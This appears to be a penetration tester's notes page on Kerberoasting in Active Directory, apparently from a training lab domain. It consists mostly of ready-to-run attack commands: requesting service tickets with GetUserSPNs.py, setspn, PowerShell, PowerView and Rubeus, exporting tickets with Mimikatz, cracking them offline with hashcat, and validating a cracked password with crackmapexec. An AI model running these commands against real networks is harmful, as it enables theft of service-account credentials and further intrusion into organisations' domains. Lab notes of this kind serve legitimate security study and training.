About me

Kerberoasting

Kerberoasting Overview

  • This attack targets Service Principal Names (SPNs) accounts.

    • Purpose of Service Principal Names (SPN) in Active Directory

      • SPNs are unique identifiers that Kerberos uses to map a service instance to a service account in whose context the service is running

        • Domain accounts are often used to run services to overcome the network authentication limitations of built-in accounts such as NT AUTHORITY\LOCAL SERVICE.

Kerberoasting - Performing the Attack

  • Depending on your position in a network, this attack can be performed in multiple ways:

    • From a non-domain joined Linux host using valid domain user credentials.

    • From a domain-joined Linux host as root after retrieving the keytab file.

    • From a domain-joined Windows host authenticated as a domain user.

    • From a domain-joined Windows host with a shell in the context of a domain account.

    • As SYSTEM on a domain-joined Windows host.

    • From a non-domain joined Windows host using runas /netonly.

Kerberoasting - from Linux

Kerberoasting with GetUserSPNs.py

GetUserSPNs.py -dc-ip 172.16.5.5 INLANEFREIGHT.LOCAL/forend

Requesting all TGS Tickets

GetUserSPNs.py -dc-ip 172.16.5.5 INLANEFREIGHT.LOCAL/forend -request

Requesting a Single TGS ticket

GetUserSPNs.py -dc-ip 172.16.5.5 INLANEFREIGHT.LOCAL/forend -request-user sqldev

Cracking the Ticket Offline with Hashcat

hashcat -m 13100 sqldev_tgs /usr/share/wordlists/rockyou.txt

  • password is database!

Testing Authentication against a Domain Controller

sudo crackmapexec smb 172.16.5.5 -u sqldev -p database!

Kerberoasting - from Windows

Manual way

Enumerating SPNs with setspn.executes

setspn.exe -Q */*

Targeting a Single User

Add-Type -AssemblyName System.IdentityModel
New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList "MSSQLSvc/DEV-PRE-SQL.inlanefreight.local:1433"

  • The Add-Type cmdlet is used to add a .NET framework class to our PowerShell session, which can then be instantiated like any .NET framework object

  • The -AssemblyName parameter allows us to specify an assembly that contains types that we are interested in using

  • System.IdentityModel is a namespace that contains different classes for building security token services

  • We'll then use the New-Object cmdlet to create an instance of a .NET Framework object

  • We'll use the System.IdentityModel.Tokens namespace with the KerberosRequestorSecurityToken class to create a security token and pass the SPN name to the class to request a Kerberos TGS ticket for the target account in our current logon session

Retrieving All Tickets Using setspn.exe

setspn.exe -T INLANEFREIGHT.LOCAL -Q */* | Select-String '^CN' -Context 0,1 | % { New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList $_.Context.PostContext[0].Trim() }

Extracting Tickets from Memory with Mimikatz

mimikatz # base64 /out:true
mimikatz # kerberos::list /export  
echo "<base64 blob>" |  tr -d \\n 
cat encoded_file | base64 -d > sqldev.kirbi
kirbi2john.py sqldev.kirbi
sed 's/\$krb5tgs\$\(.*\):\(.*\)/\$krb5tgs\$23\$\*\1\*\$\2/' crack_file > sqldev_tgs_hashcat
hashcat -m 13100 sqldev_tgs_hashcat /usr/share/wordlists/rockyou.txt

Automated / Tool Based Route

Using PowerView to Extract TGS Tickets

Import-Module .\PowerView.ps1
Get-DomainUser * -spn | select samaccountname

Using PowerView to Target a Specific User

Get-DomainUser -Identity sqldev | Get-DomainSPNTicket -Format Hashcat

Exporting All Tickets to a CSV File

Get-DomainUser * -SPN | Get-DomainSPNTicket -Format Hashcat | Export-Csv .\ilfreight_tgs.csv -NoTypeInformation

Using Rubeus

.\Rubeus.exe kerberoast /stats
 .\Rubeus.exe kerberoast /ldapfilter:'admincount=1' /nowrap

Using the /tgtdeleg Flag

  • /tgtdeleg flag, the tool requested an RC4 ticket even though the supported encryption types are listed as AES 128/256

Reference

  • https://adsecurity.org/?p=3458

PreviousLDAP Filtering ExplainedNextMimikatz

Last updated